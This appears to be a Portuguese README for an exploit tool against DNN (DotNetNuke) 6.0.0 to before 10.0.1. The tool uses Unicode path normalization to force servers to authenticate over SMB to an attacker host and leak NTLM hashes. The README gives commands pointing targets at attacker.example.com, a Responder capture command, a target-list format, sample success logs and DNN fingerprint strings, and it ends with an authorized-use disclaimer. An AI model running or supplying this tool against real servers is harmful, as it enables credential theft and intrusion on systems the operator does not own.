
Este exploit tem como alvo uma vulnerabilidade no DNN (anteriormente DotNetNuke) nas versões 6.0.0 até antes de 10.0.1 que permite que atacantes revelem hashes NTLM por meio de ataques de normalização de caminho Unicode.
Este exploit visa uma vulnerabilidade nas versões 6.0.0 até antes de 10.0.1 do DNN (anteriormente DotNetNuke) que permite a atacantes divulgar hashes NTLM por meio de ataques de normalização de caminho Unicode.
O exploit abusa de peculiaridades do Windows/.NET e da normalização Unicode para forçar o servidor DNN alvo a fazer requisições SMB a um servidor controlado pelo atacante, potencialmente expondo hashes NTLM durante o processo de autenticação.
pip install -r requirements.txt)python main.py targets.txt attacker.example.com
python main.py targets.txt 192.168.1.100 -t 20 --timeout 15
targets: Arquivo contendo a lista de hosts DNN (um por linha)smb_server: Hostname/IP do servidor SMB para capturar hashes NTLM-t, --threads: Número de threads concorrentes (padrão: 10)--timeout: Tempo limite de requisição em segundos (padrão: 10)Crie um arquivo de texto com as URLs dos alvos, uma por linha:
http://target1.example.com
https://target2.example.com:8080
target3.example.com
Você pode usar ferramentas como Responder para capturar hashes NTLM:
responder -I eth0 -wrf
Ou use o Burp Collaborator para detecção fora de banda.
[2025-01-XX-XX:XX:XX] [INFO] Starting DNN NTLM hash disclosure exploit against 5 targets
[2025-01-XX-XX:XX:XX] [INFO] SMB Server: attacker.example.com
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] DNN indicator found: dnn_IsMobile
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] File upload endpoint accessible
[2025-01-XX-XX:XX:XX] [SUCCESS] [target1.com] Exploit payload sent successfully
[2025-01-XX-XX:XX:XX] [INFO] [target1.com] Check your SMB server for incoming NTLM authentication attempts
O exploit procura pelos seguintes indicadores do DNN:
dnn_IsMobiledotnetnuke na respostadnnconnect na respostaDNN Platform na respostaEsta ferramenta destina-se apenas a fins educacionais e de teste de segurança autorizado. Use com responsabilidade e somente em sistemas que você possui ou sobre os quais tem permissão explícita para testar.